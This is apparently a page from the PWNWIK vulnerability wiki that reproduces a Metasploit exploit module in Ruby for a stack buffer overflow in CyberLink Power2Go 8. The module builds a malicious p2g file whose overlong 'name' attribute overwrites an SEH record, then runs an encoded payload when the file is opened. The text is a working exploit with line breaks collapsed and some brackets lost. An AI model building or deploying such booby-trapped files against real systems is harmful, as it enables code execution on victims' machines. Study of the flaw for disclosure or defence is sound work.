PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
EXP
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit', 'Description' => %q{ This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x The vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. This results in overwriting a structured exception handler record. }, 'License' => MSF_LICENSE, 'Author' => 'modpr0be <modpr0beatspentera.com>', # initial discovery 'mr_me <steventhomasseeleyatgmail.com>' # msf module , 'References' => 'BID', '50997', 'OSVDB', '70600', 'URL', 'http://www.exploit-db.com/exploits/18220/', 'URL', 'http://www.kb.cert.org/vuls/id/158003' , 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00" }, 'Platform' => 'win', 'Targets' => # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } , 'DisclosureDate' => 'Sep 12 2011', 'DefaultTarget' => 0)) register_options( OptString.new('FILENAME', true, 'The output filename.', 'msf.p2g') , self.class) end def get_payload(hunter) 'x86/alpha_mixed', 'x86/unicode_mixed' .each { |name| enc = framework.encoders.create(name) if name =~ /unicode/ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) else enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' }) end # NOTE: we already eliminated badchars hunter = enc.encode(hunter, nil, nil, platform) if name =~/alpha/ #insert getpc_stub & align EDX, unicode encoder friendly. #Hardcoded stub is not an issue here because it gets encoded anyway getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35" hunter = getpc_stub + hunter end } return hunter end def exploit title = rand_text_alpha(10) buffer = "" buffer << rand_text_alpha(778) buffer << "\x58\x28" # nseh buffer << target'Ret' # seh buffer << "\x5f\x73" * 15 # pop edi/add ebx,dh (after byte alignment) buffer << "\x58\x73" # pop eax/add ebx,dh (after byte alignment) buffer << "\x40\x73" * 3 # inc eax/add ebx,dh (after byte alignment) buffer << "\x40" # inc eax buffer << "\x73\x42" * 337 # add ebx,dh/pop edx (after byte alignment) buffer << "\x73" # add ebx,dh (after byte alignment) buffer << get_payload(payload.encoded) p2g_data = <<-EOS <Project magic="#{title}" version="101"> <Information /> <Compilation> <DataDisc> <File name="#{buffer}" /> </DataDisc> </Compilation> </Project> EOS print_status("Creating '#{datastore'FILENAME'}' file ...") file_create(p2g_data) end end
PWNWIK.COM==免费、自由、人人可编辑的漏洞库